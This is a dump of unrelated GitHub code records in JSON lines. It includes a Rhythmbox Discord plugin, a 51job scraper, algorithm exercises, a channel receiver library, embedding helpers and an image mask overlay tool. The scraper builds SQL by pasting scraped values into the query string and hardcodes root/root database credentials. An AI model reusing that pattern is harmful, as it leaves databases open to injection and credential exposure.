state=\"Playback Stopped\",\r\n details=\"Rhythmbox Status Plugin\",\r\n large_image=\"rhythmbox\",\r\n small_image=\"stop\",\r\n small_text=\"Stopped\"\r\n )\r\n else:\r\n song_info = self.get_current_song_info(sp)\r\n\r\n if self.streaming or self.stream_flag:\r\n self.rpc.update(\r\n state=song_info[\"title\"][0:127],\r\n details=\"Stream\",\r\n large_image=\"rhythmbox\",\r\n small_image=\"play\",\r\n small_text=\"Streaming\",\r\n start=int(time.time())\r\n )\r\n \r\n return\r\n\r\n self.playing = playing\r\n title = song_info[\"title\"]\r\n artist = song_info[\"artist\"]\r\n details = f\"{title} - {artist}\"\r\n pos = sp.get_playing_time().time\r\n start_time = int(time.time()) if self.settings[\"time_style\"] == 1 else int(time.time()) - pos\r\n end_time = (start_time + song_info[\"duration\"] - pos) if self.settings[\"time_style\"] == 1 else None\r\n\r\n self.rpc.update(\r\n state=song_info[\"album\"][0:127],\r\n details=details[0:127],\r\n large_image=\"rhythmbox\",\r\n small_image=\"play\" if playing else \"pause\",\r\n small_text=\"Playing\" if playing else \"Paused\",\r\n start=start_time if playing else None,\r\n end=end_time if playing else None\r\n )\r\n\r\n def on_playing_song_changed(self, sp, entry):\r\n print(f\"discord_status: playing song changed sp={sp} entry={entry}\")\r\n\r\n if not sp.get_playing_entry():\r\n return\r\n\r\n self.song_started_at = int(time.time())\r\n self.playing_date = self.song_started_at\r\n self.elapsed_time = 0\r\n current_song_info = self.get_current_song_info(sp)\r\n\r\n self.streaming = current_song_info[\"duration\"] == 0 and self.streaming\r\n \r\n self.update_rpc(sp, True)\r\n\r\n\r\n def on_playing_state_changed(self, sp, playing):\r\n print(f\"discord_status: playing state changed sp={sp} playing={playing}\")\r\n self.update_rpc(sp, playing)\r\n\r\n def on_elapsed_changed(self, sp, elapsed):\r\n print(f\"discord_status: elapsed changed sp={sp} elapsed={elapsed}\")\r\n\r\n if self.playing:\r\n self.playing_date += 1\r\n\r\n if self.playing_date - elapsed != self.song_started_at and elapsed != 0:\r\n self.playing_date = self.song_started_at + elapsed\r\n print(\"discord_status: elapsed changed too much\")\r\n self.update_rpc(sp, True)\r\n\r\n\r\n def on_playing_song_property_changed(self, sp, uri, property, old, newvalue):\r\n print(f\"discord_status: playing song property changed sp={sp} uri={uri} property={property} old={old} newvalue={newvalue}\")\r\n if property == \"rb:stream-song-title\":\r\n self.streaming = True\r\n self.update_rpc(sp, True)\r\n","repo_name":"ToppleKek/discord-rhythmbox-plugin","sub_path":"discord-status.py","file_name":"discord-status.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"94"} +{"seq_id":"8249966222","text":"# -*- coding: utf-8 -*- \n# Software: PyCharm\n# Author: df\n# CreateTime: 2022-08-05 14:29\n# file: pachong.py\nimport re # 正则表达式,进行文字匹配\nimport urllib.request, urllib.error # 制定url,获取网页数据 ,\nfrom urllib import parse # 用来解析web需要的字符串\nimport json\nimport pymysql # mysql操作\n\n\ndef main():\n serach = \"java开发\"\n # 处理中文字符搜索问题\n # keysword=parse.quote(serach)\n # 再进行转义才能达到链接里的效果:java%25E5%25BC%2580%25E5%258F%2591\n # 二次编码\n # newkeyword=parse.quote(keysword)\n dataList = getData()\n saveDB(dataList)\n\n\ndef askurl(url):\n # 模拟浏览器头部信息,像对应的url发送信息\n # 有时候403就放cookie就好使了\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Edg/103.0.1264.77\",\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n reponse = urllib.request.urlopen(request);\n # 这里51job界面是gbk的模式,如果这里用utf-8则报错,为: 'utf-8' codec can't decode byte 0xa1 in position 293: invalid start byte\n html = reponse.read().decode(\"gbk\")\n # print(html)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n return html;\n\n\n# 获取并解析数据\ndef getData():\n # htmlx=open(\"51job.html\",\"r\")\n # bs=BeautifulSoup(htmlx,\"html.parser\")\n # ss=bs.select(\"div\")\n # print(bs)\n serach = \"java开发\"\n keysword = parse.quote(parse.quote(serach))\n page = 0\n\n totalDataList = []\n\n # 循环分页处理,当查询不到数据就跳出循环\n while True:\n page = page + 1;\n url = \"https://search.51job.com/list/010000,000000,0000,00,9,99,\" + keysword + \",2,\" + str(page) + \".html\"\n html = askurl(url)\n print(\"baseUrl\", url)\n\n # 得到脚本数据里需要的数据,得到的数据就是一整个列表,取出下标0则可以进行遍历\n datas = re.findall('window.__SEARCH_RESULT__ =(.*?)', str(html))[0]\n # 转换json可以根据键值对获取数据\n json_data = json.loads(datas)\n engines = json_data['engine_jds']\n\n # 跳出死循环\n if len(engines) == 0:\n break\n\n for engine in engines:\n dataGroup = []\n # 招聘职位\n if engine.get(\"job_name\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"job_name\"))\n # 公司名称\n if engine.get(\"company_name\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"company_name\"))\n # 薪资范围\n if engine.get(\"providesalary_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"providesalary_text\"))\n # 地点\n if engine.get(\"workarea_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"workarea_text\"))\n # 公司类型\n if engine.get(\"companytype_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companytype_text\"))\n # 学历要求\n if engine.get(\"degreefrom\") == \"\":\n dataGroup.append(\"0\")\n else:\n dataGroup.append(engine.get(\"degreefrom\"))\n # 工作年限\n if engine.get(\"workyear\") == \"\":\n dataGroup.append(\"0\")\n else:\n dataGroup.append(engine.get(\"workyear\"))\n # 公司福利\n if engine.get(\"jobwelf\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"jobwelf\"))\n\n # 公司规模\n if engine.get(\"companysize_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companysize_text\"))\n\n # 公司经营方向\n if engine.get(\"companyind_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companyind_text\"))\n\n # 发布时间\n if engine.get(\"updatedate\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"updatedate\"))\n\n\n totalDataList.append(dataGroup)\n return totalDataList\n\n\ndef saveDB(dataList):\n conn = pymysql.connect(host=\"localhost\", user=\"root\", password=\"root\", port=3306, db='spider', charset=\"utf8\")\n cursor = conn.cursor()\n\n try:\n for data in dataList:\n for index in range(len(data)):\n if index == 6 or index == 5:\n continue\n data[index] = '\"' + str(data[index]) + '\"'\n\n sql = '''insert into 51job (job_name,company_name,providesalary_text,workarea_text,companytype_text,degreefrom,workyear,jobwelf,companysize_text,companyind_text,updatedate)\n values(%s)'''% \",\".join(data)\n print(sql)\n cursor.execute(sql)\n print(\"保存成功\")\n except Exception as result:\n print(result)\n conn.rollback()\n finally:\n conn.commit()\n cursor.close()\n conn.close()\n\n\n\ndef test():\n ss={\"name\":\"\"}\n print(ss.get(\"name\"))\n if ss.get(\"name\")==\"\":\n print(\"pp\")\n\n\nif __name__ == \"__main__\":\n #test()\n main()\n # parserData(\"\")\n","repo_name":"dufGIT/python-progect","sub_path":"51job/pachong.py","file_name":"pachong.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23657629773","text":"from collections import defaultdict\n\n#dfs\nclass Solution:\n def validPath(self, n: int, edges: List[List[int]], start: int, end: int) -> bool:\n s = []\n d = defaultdict(list)\n for i in edges:\n d[i[0]].append(i[1])\n d[i[1]].append(i[0])\n\n seen = set()\n s.append(start)\n\n while s:\n n = s.pop()\n if n == end:\n return True\n\n if n not in seen:\n seen.add(n)\n for i in d[n]:\n s.append(i)\n\n return False\n\n\n\n","repo_name":"salonikalsekar/LC","sub_path":"graph_theory/find_if_path_exists.py","file_name":"find_if_path_exists.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24504285834","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#Import Modules\nimport os\nimport csv\n\n\n# In[16]:\n\n\n#Build the path to the csv file\ncsv_path = os.path.join(\"Resources\",\"budget_data.csv\")\n\n#Open a file handler\nwith open(csv_path,\"r\",newline=\"\") as csv_file:\n \n #connect the csv file with a file reader\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n \n #remove the header\n header = next(csv_reader)\n \n #define counters\n total_months = 0\n total_profit = 0\n first = 0\n first_iteration = True\n \n delta_list = []\n date_list = []\n \n for row in csv_reader:\n \n #Calculate the total months\n total_months += 1\n \n #Calculate total profit\n profit = int(row[1])\n total_profit += profit\n \n #Calculate the change\n second = int(row[1])\n delta = second - first\n \n #Skip the first calculation for delta as it is not a true delta\n if first_iteration == False:\n delta_list.append(delta)\n date_list.append(row[0])\n \n \n \n first_iteration = False\n first = second\n \n #Final Calculations\n max_change = max(delta_list)\n min_change = min(delta_list)\n average_change = round(sum(delta_list)/len(delta_list), 2)\n \n #Identify dates for max and min change\n index = 0\n for index in range(len(delta_list)):\n \n if int(delta_list[index]) == max_change:\n max_index = index\n \n \n if int(delta_list[index]) == min_change:\n min_index = index\n \n \n index += 1\n \nmax_date = date_list[max_index]\nmin_date = date_list[min_index]\n \n#Print report on terminal\nprint(\"Financial Analysis\")\nprint(\"---------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total_profit}\")\nprint(f\"Average Change: ${average_change}\")\nprint(f\"Greatest Increase in Profits: {max_date} (${max_change})\")\nprint(f\"Greatest Decrease in Profits: {min_date} (${min_change})\")\n \n \noutput_file_path = os.path.join(\"Resources\", \"output.txt\")\n\nwith open(output_file_path,\"w\",newline = \"\") as output_file:\n \n output_file.write(\"Financial Analysis\\n\")\n output_file.write(\"-------------------------------\\n\")\n output_file.write(\"Total Months: \" + str(total_months) + \"\\n\")\n output_file.write(\"Total: $\" +str(total_profit) + \"\\n\")\n output_file.write(\"Average Change: $\" + str(average_change) + \"\\n\")\n output_file.write(\"Greatest Increase in Profits: \" + max_date + \" ($\" + str(max_change) + \")\\n\")\n output_file.write(\"Greatest Decrease in Profits: \" + min_date + \" ($\" + str(min_change) + \")\\n\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ahmar-jamal/python-challenge","sub_path":"PyBank/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43601376005","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Callable\nfrom typing import Generic, Self, TypeVar\n\nfrom ._exceptions import Error\n\n_T = TypeVar(\"_T\")\n_U = TypeVar(\"_U\")\n\n\nclass Receiver(ABC, Generic[_T]):\n \"\"\"A channel Receiver.\"\"\"\n\n async def __anext__(self) -> _T:\n \"\"\"Await the next value in the async iteration over received values.\n\n Returns:\n The next value received.\n\n Raises:\n StopAsyncIteration: if the receiver stopped producing messages.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n try:\n await self.ready()\n return self.consume()\n except ReceiverStoppedError as exc:\n raise StopAsyncIteration() from exc\n\n @abstractmethod\n async def ready(self) -> bool:\n \"\"\"Wait until the receiver is ready with a value or an error.\n\n Once a call to `ready()` has finished, the value should be read with\n a call to `consume()` (`receive()` or iterated over). The receiver will\n remain ready (this method will return immediately) until it is\n consumed.\n\n Returns:\n Whether the receiver is still active.\n \"\"\"\n\n @abstractmethod\n def consume(self) -> _T:\n \"\"\"Return the latest value once `ready()` is complete.\n\n `ready()` must be called before each call to `consume()`.\n\n Returns:\n The next value received.\n\n Raises:\n ReceiverStoppedError: if the receiver stopped producing messages.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n\n def __aiter__(self) -> Self:\n \"\"\"Initialize the async iterator over received values.\n\n Returns:\n `self`, since no extra setup is needed for the iterator.\n \"\"\"\n return self\n\n async def receive(self) -> _T:\n \"\"\"Receive a message from the channel.\n\n Returns:\n The received message.\n\n Raises:\n ReceiverStoppedError: if there is some problem with the receiver.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n try:\n received = await self.__anext__() # pylint: disable=unnecessary-dunder-call\n except StopAsyncIteration as exc:\n # If we already had a cause and it was the receiver was stopped,\n # then reuse that error, as StopAsyncIteration is just an artifact\n # introduced by __anext__.\n if (\n isinstance(exc.__cause__, ReceiverStoppedError)\n # pylint is not smart enough to figure out we checked above\n # this is a ReceiverStoppedError and thus it does have\n # a receiver member\n and exc.__cause__.receiver is self # pylint: disable=no-member\n ):\n raise exc.__cause__\n raise ReceiverStoppedError(self) from exc\n return received\n\n def map(self, call: Callable[[_T], _U]) -> Receiver[_U]:\n \"\"\"Return a receiver with `call` applied on incoming messages.\n\n Args:\n call: function to apply on incoming messages.\n\n Returns:\n A `Receiver` to read results of the given function from.\n \"\"\"\n return _Map(self, call)\n\n\nclass ReceiverError(Error, Generic[_T]):\n \"\"\"An error produced in a [Receiver][frequenz.channels.Receiver].\n\n All exceptions generated by receivers inherit from this exception.\n \"\"\"\n\n def __init__(self, message: str, receiver: Receiver[_T]):\n \"\"\"Create an instance.\n\n Args:\n message: An error message.\n receiver: The [Receiver][frequenz.channels.Receiver] where the\n error happened.\n \"\"\"\n super().__init__(message)\n self.receiver: Receiver[_T] = receiver\n \"\"\"The receiver where the error happened.\"\"\"\n\n\nclass ReceiverStoppedError(ReceiverError[_T]):\n \"\"\"The [Receiver][frequenz.channels.Receiver] stopped producing messages.\"\"\"\n\n def __init__(self, receiver: Receiver[_T]):\n \"\"\"Create an instance.\n\n Args:\n receiver: The [Receiver][frequenz.channels.Receiver] where the\n error happened.\n \"\"\"\n super().__init__(f\"Receiver {receiver} was stopped\", receiver)\n\n\nclass _Map(Receiver[_U], Generic[_T, _U]):\n \"\"\"Apply a transform function on a channel receiver.\n\n Has two generic types:\n\n - The input type: value type in the input receiver.\n - The output type: return type of the transform method.\n \"\"\"\n\n def __init__(self, receiver: Receiver[_T], transform: Callable[[_T], _U]) -> None:\n \"\"\"Create a `Transform` instance.\n\n Args:\n receiver: The input receiver.\n transform: The function to run on the input data.\n \"\"\"\n self._receiver: Receiver[_T] = receiver\n \"\"\"The input receiver.\"\"\"\n\n self._transform: Callable[[_T], _U] = transform\n \"\"\"The function to run on the input data.\"\"\"\n\n async def ready(self) -> bool:\n \"\"\"Wait until the receiver is ready with a value or an error.\n\n Once a call to `ready()` has finished, the value should be read with\n a call to `consume()` (`receive()` or iterated over). The receiver will\n remain ready (this method will return immediately) until it is\n consumed.\n\n Returns:\n Whether the receiver is still active.\n \"\"\"\n return await self._receiver.ready() # pylint: disable=protected-access\n\n # We need a noqa here because the docs have a Raises section but the code doesn't\n # explicitly raise anything.\n def consume(self) -> _U: # noqa: DOC502\n \"\"\"Return a transformed value once `ready()` is complete.\n\n Returns:\n The next value that was received.\n\n Raises:\n ChannelClosedError: if the underlying channel is closed.\n \"\"\"\n return self._transform(\n self._receiver.consume()\n ) # pylint: disable=protected-access\n\n def __str__(self) -> str:\n \"\"\"Return a string representation of the timer.\"\"\"\n return f\"{type(self).__name__}:{self._receiver}:{self._transform}\"\n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of the timer.\"\"\"\n return f\"{type(self).__name__}({self._receiver!r}, {self._transform!r})\"\n","repo_name":"frequenz-floss/frequenz-channels-python","sub_path":"src/frequenz/channels/_receiver.py","file_name":"_receiver.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"31010107394","text":"# -*- coding: utf-8 -*-\n# czatpro/czat/urls.py\n\nfrom django.conf.urls import url\nfrom czat import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^loguj/$', views.loguj, name='loguj'),\n url(r'^wyloguj/$', views.wyloguj, name='wyloguj'),\n url(r'^wiadomosci/$', views.wiadomosci, name='wiadomosci'),\n]\n","repo_name":"koduj-z-klasa/python101-py2","sub_path":"docs/webapps/czat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"4896337911","text":"import os.path\r\nfrom itertools import islice\r\nimport ijson\r\nimport pandas as pd\r\nimport numpy as np\r\nimport torch\r\n\r\nfrom tqdm import tqdm\r\nfrom transformers import AutoTokenizer, AutoModel\r\nfrom sentence_transformers import SentenceTransformer\r\n\r\nfrom embeddings.utils import get_underscored_name, mkdirs\r\n\r\n\r\ndef get_embedding(text, model, tokenizer, model_type=\"specter\"):\r\n if model_type.startswith(\"specter_simcse\") : return torch.tensor(model.encode(text))\r\n else:\r\n inputs = tokenizer(text, padding=True, truncation=True, return_tensors=\"pt\", max_length=512)\r\n return model(**inputs).last_hidden_state[:, 0, :]\r\n\r\n\r\ndef get_scibert_model():\r\n tokenizer = AutoTokenizer.from_pretrained('allenai/scibert_scivocab_uncased')\r\n model = AutoModel.from_pretrained('allenai/scibert_scivocab_uncased')\r\n return model, tokenizer\r\n\r\n\r\ndef get_specter_model():\r\n tokenizer = AutoTokenizer.from_pretrained('allenai/specter')\r\n model = AutoModel.from_pretrained('allenai/specter')\r\n return model, tokenizer\r\n\r\n\r\ndef get_custom_model(model_dir: str):\r\n if not os.path.exists(model_dir):\r\n print(f\"Error while parsing: {model_dir}. Model path directory with this name does not exist!\")\r\n return None\r\n\r\n model = SentenceTransformer(model_dir)\r\n tokenizer = None\r\n return model, tokenizer\r\n\r\n\r\ndef get_model(model_type: str,\r\n custom_model_dir=\"\"):\r\n if model_type == \"specter\": return get_specter_model()\r\n if model_type in ['scibert_average', 'scibert_cls']: return get_scibert_model()\r\n if model_type.startswith(\"specter_simcse\"): return get_custom_model(custom_model_dir)\r\n print(\"Error!! Invalid model name in get_model()\")\r\n return None, None\r\n\r\n\r\ndef create_author_embeddings(author, model_name=\"specter\", model=[], tokenizer=[], in_or_out=\"in\"):\r\n if \"Publications\" not in author: return\r\n\r\n auth_underscore_name = get_underscored_name(author['romanize name'])\r\n fname_out = f'./author_embeddings/{model_name}_embeddings/{in_or_out}'\r\n emb_total = []\r\n mkdirs(fname_out)\r\n publication_texts = []\r\n\r\n print(f\"{auth_underscore_name}, total papers:{len(author['Publications'])}\")\r\n\r\n for paper in author['Publications']:\r\n try: title_abs = paper['Title'] + \" [SEP] \" + paper['Abstract'] if (\"Abstract\" in paper and paper[\"Abstract\"]) else paper['Title']\r\n except: title_abs = paper['title'] + \" [SEP] \" + paper['Abstract'] if (\"Abstract\" in paper and paper[\"Abstract\"]) else paper['title']\r\n publication_texts.append(title_abs)\r\n\r\n if model_name == \"specter\":\r\n for title_abs in publication_texts:\r\n emb_total.append(get_embedding(title_abs, model, tokenizer, model_name))\r\n else: emb_total = model.encode(publication_texts)\r\n\r\n pd.DataFrame(emb_total).to_csv(fname_out + f'/{auth_underscore_name}.csv', header=False, index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n","repo_name":"nikifori/Apella-plus-thesis","sub_path":"embeddings_py/sentence_transformer_models.py","file_name":"sentence_transformer_models.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19745000718","text":"import sqlite3\nimport pandas as pd\nfrom tabulate import tabulate\n\ns_id = input('Service ID:')\n\ndef getDeveloperName(id):\n try:\n sqliteConnection = sqlite3.connect('/home/wnaina/Bureau/fanompo_script/fanompo.db')\n cursor = sqliteConnection.cursor()\n select_query = \"SELECT * FROM services where numSVC = ?\"\n fanome_query = \"SELECT max(c.Daty), m.membID, m.Fiantso, s.anarFohy from membres m \\\n join calend c on m.membID = c.mbID JOIN services s on \\\n c.svcID = s.numSVC where c.svcID=? group by m.Fiantso order by c.Daty desc\"\n memb_query = \"SELECT m.membID, m.Fiantso from membres m join fanome f on m.membID = f.mb \\\n where f.svc=? \"\n\n cursor.execute(select_query, (id,))\n name = cursor.fetchone()\n\n print(name)\n cursor.execute(fanome_query, (id,))\n fanome = cursor.fetchall()\n df=pd.DataFrame(fanome)\n cursor.execute(memb_query, (id,))\n memb = cursor.fetchall()\n dff=pd.DataFrame(memb)\n print(\"Isan ny Mpanao: \",len(memb))\n print(\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n print (tabulate(df,headers=[\"Daty\",\"Fiantso\",\"Service\"]))\n print(\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n print (tabulate(dff,headers=[\"Num\",\"Fiantso\"]))\n cursor.close()\n \n\n except sqlite3.Error as error:\n print(\"Failed to read data from sqlite table\", error)\n finally: \n sqliteConnection.close()\n print(\"sqlite connection is closed\")\n\ngetDeveloperName(s_id)","repo_name":"wraivo/djfanompo","sub_path":"Bureau/fanompo_script/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2930623044","text":"import pandas\n\n[NAME, INIT, INIT_SD, REAN, REAN_SD, NOOPT, NOOPT_SD, CI, CI_SD, DI, DI_SD, WI, WI_SD, CIDI, CIDI_SD, CIWI, CIWI_SD, DIWI, DIWI_SD, CIDIWI, CIDIWI_SD] = range(21)\n# Preprocessing: first run tail +1 performance\\ generated.txt | grep -v \", ,\" > perf.csv\ndata = pandas.read_csv('perf.csv', header=None)\n\ndata_slower_than_100ms = data[data[INIT] >= 100]\n\n# Filter the data to only keep these benchmarks that have 5 variants.\n# This is less than optimal, but good enough\nactual_data = data_slower_than_100ms\nfor name in data_slower_than_100ms[NAME]:\n # Get the base name of the benchmark (remove the -1.scm part)\n basename = '-'.join(name.split('-')[:-1])\n count = len([name2 for name2 in data_slower_than_100ms[NAME] if name2.startswith(basename)])\n if count < 5:\n print('Removing %s' % name)\n actual_data = actual_data[actual_data[NAME] != name]\n\nprint(actual_data)","repo_name":"softwarelanguageslab/maf","sub_path":"scripts/Python/filterBenchData.py","file_name":"filterBenchData.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"96"} +{"seq_id":"21739713726","text":"import sys\r\nfrom collections import deque\r\nimport heapq\r\ninput = sys.stdin.readline\r\nn = int(input())\r\narr = [list(input().rstrip().split()) for _ in range(n)]\r\nba = []\r\nst = []\r\nfor i in range(n):\r\n for j in range(n):\r\n if arr[i][j] == \"X\": ba.append([i, j])\r\n elif arr[i][j] == \"S\": st.append([i, j])\r\nfor i in range(len(ba) - 2):\r\n arr[ba[i][0]][ba[i][1]] = \"B\"\r\n for j in range(i + 1, len(ba) - 1):\r\n arr[ba[j][0]][ba[j][1]] = \"B\"\r\n for k in range(j + 1, len(ba)):\r\n arr[ba[k][0]][ba[k][1]] = \"B\"\r\n flag = True\r\n for x, y in st:\r\n for z in range(y + 1, n):\r\n if arr[x][z] == \"T\": flag = False; break\r\n elif arr[x][z] == \"B\": break\r\n for z in range(y - 1, -1, -1):\r\n if arr[x][z] == \"T\": flag = False; break\r\n elif arr[x][z] == \"B\": break\r\n for z in range(x + 1, n):\r\n if arr[z][y] == \"T\": flag = False; break\r\n elif arr[z][y] == \"B\": break\r\n for z in range(x - 1, -1, -1):\r\n if arr[z][y] == \"T\": flag = False; break\r\n elif arr[z][y] == \"B\": break\r\n if flag: print(\"YES\"); exit(0)\r\n arr[ba[k][0]][ba[k][1]] = \"X\"\r\n arr[ba[j][0]][ba[j][1]] = \"X\"\r\n arr[ba[i][0]][ba[i][1]] = \"X\"\r\nprint(\"NO\")","repo_name":"secrett2633/replit_algorithm","sub_path":"백준/Gold/18428. 감시 피하기/감시 피하기.py","file_name":"감시 피하기.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34638118463","text":"import os\nfrom collections.abc import Iterable\nfrom typing import Optional, Tuple, Union, List\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors as C\nfrom matplotlib.patches import Patch\nfrom PIL import Image as PILImage\n\nfrom .label_color import LabelColor\nfrom .utils import open_with_PIL\n\n\ndef overlay_masks(\n image: Union[os.PathLike, PILImage.Image, np.ndarray],\n boolean_masks: Union[np.ndarray, List[np.ndarray]],\n labels: Optional[List[str]] = None,\n colors: Optional[Union[np.ndarray, List[Union[str, List[float]]]]] = None,\n figsize: Tuple[int, int] = (8, 8),\n dpi: int = 90,\n mask_alpha: float = 0.4,\n mpl_colormap: str = \"tab20\",\n return_pil_image: bool = False,\n):\n \"\"\"Overlays masks on the image.\n Parameters\n ----------\n image : Union[str, PIL.Image.Image, np.ndarray]\n Image path or PIl.Image or numpy array. If image size inconsistent with\n the masks size, image will be resized.\n boolean_masks : List[np.ndarray[bool]]\n List of segmentation masks or numpy array of shape (height, width, n_classes).\n All masks should be the same size, equal to size of the image.\n labels : Optional[List[str]], optional\n Optional label names. Provide in the same order as the corresponding masks.\n If not provided, will be set as range(len(boolean_masks)), by default None\n colors : Union[np.ndarray, List[Union[str, List[float]]]], optional\n Array of shape (n_labels x 4) or list of matplotlib acceptable colornames.\n Example to get persistent colormap: `plt.cm.tab20(np.arange(NUM_LABELS))`\n figsize : tuple, optional\n Size in inches of the output image, by default (12, 12)\n dpi : int, optional\n Resolution of the output image. Note: 'px, py = w * dpi, h * dpi', by default 120\n mask_alpha : float, optional\n Masks opaque value, by default 0.4\n mpl_colormap : str\n Matplotlib colormap name\n return_pil_image : bool\n If True, will return PIL image instead of matpotlib figure.\n\n Returns\n -------\n plt.Figure | PIL.Image\n Output mpl figure or pillow image with masks.\n \"\"\"\n\n if isinstance(boolean_masks, np.ndarray):\n assert (boolean_masks.ndim == 3 and boolean_masks.dtype == bool), (\n \"boolean_masks should be a list boolean numpy\"\n + \" arrays or 3-dim numpy array with the last dim\"\n + \" as a channel to store masks of different classes\"\n )\n boolean_masks = [boolean_masks[:, :, i] for i in range(boolean_masks.shape[-1])]\n\n if labels is not None:\n assert len(labels) == len(boolean_masks), (\n \"Number of provided labels != number of masks\"\n )\n else:\n labels = [f\"{_:02d}\" for _ in range(len(boolean_masks))]\n\n pil_image = open_with_PIL(image)\n image_size = tuple(np.array(pil_image.size)[::-1])\n\n assert all(\n mask.shape == image_size for mask in boolean_masks\n ), \"Label mask size is not equal to image size\"\n\n if colors is None:\n cbar = LabelColor(\n num_labels=len(boolean_masks),\n alpha=mask_alpha,\n return_legend_color=True,\n mpl_colormap=mpl_colormap,\n )\n\n else:\n assert len(colors) == len(boolean_masks), (\n \"Number of provided colors != number of masks\"\n )\n if all(isinstance(c, str) for c in colors):\n colors = [C.to_rgba(c) for c in colors]\n\n if isinstance(colors, Iterable):\n colors = np.array(colors)\n\n assert colors.ndim == 2 and colors.shape[-1] == 4, (\n \"Unsupported color format:\"\n + \" should be list of matplotlib colorname strings for each mask/mask_channel,\"\n + \" list of RGBA arrays or 2-dim numpy array of shape (n_labels x 4)\"\n )\n\n mask_colors = colors.copy()\n mask_colors[:, -1] *= mask_alpha\n mask_colors = (mask_colors * 255).astype(\"uint8\")\n cbar = zip(mask_colors, colors)\n\n segmentation_overlay = np.zeros((*image_size, 4), dtype=np.uint16)\n segmentation_mask = np.zeros(image_size, dtype=bool)\n legend_elements = []\n\n for mask, label, (color, legend_color) in zip(boolean_masks, labels, cbar):\n\n assert mask.dtype == \"bool\"\n\n intersection = mask & segmentation_mask\n segmentation_mask = mask | segmentation_mask\n\n # Paint non-overlapping area\n segmentation_overlay[mask ^ intersection] = color\n\n # Blend overlapping area\n segmentation_overlay[intersection] = (\n segmentation_overlay[intersection] + color\n ) / 2\n\n legend_elements.append(Patch(color=legend_color, label=label))\n\n segmentation_overlay = PILImage.fromarray(segmentation_overlay.astype(\"uint8\"))\n pil_image.paste(segmentation_overlay, mask=segmentation_overlay)\n\n if return_pil_image:\n return pil_image\n \n else:\n fig = plt.figure(figsize=figsize, dpi=dpi)\n plt.imshow(pil_image)\n plt.axis(\"off\")\n mask_legend = plt.legend(\n handles=legend_elements,\n loc=\"upper left\",\n frameon=False,\n bbox_to_anchor=(1.01, 1),\n )\n plt.subplots_adjust(left=0.8)\n plt.tight_layout()\n plt.gca().add_artist(mask_legend)\n\n return fig\n","repo_name":"Irtaza147/Smart_parking","sub_path":"venv/Lib/site-packages/segmentation_mask_overlay/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26433739462","text":"import skimage\nimport skimage.filters\nimport skimage.color\nimport random\nfrom random import randint\nfrom random import shuffle\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass AugmentBatch:\n\n def __init__(self):\n # Initialize seed\n #random.seed(42)\n # Create a list of functions that could be applied on the batch\n self.__list_func = [lambda img: self.convert_to_gray(img), lambda img: self.add_noise(img),\n lambda img: self.add_gaussian(img), lambda img: self.convert_to_sepia(img),\n lambda img: self.color_swap(img), lambda img: 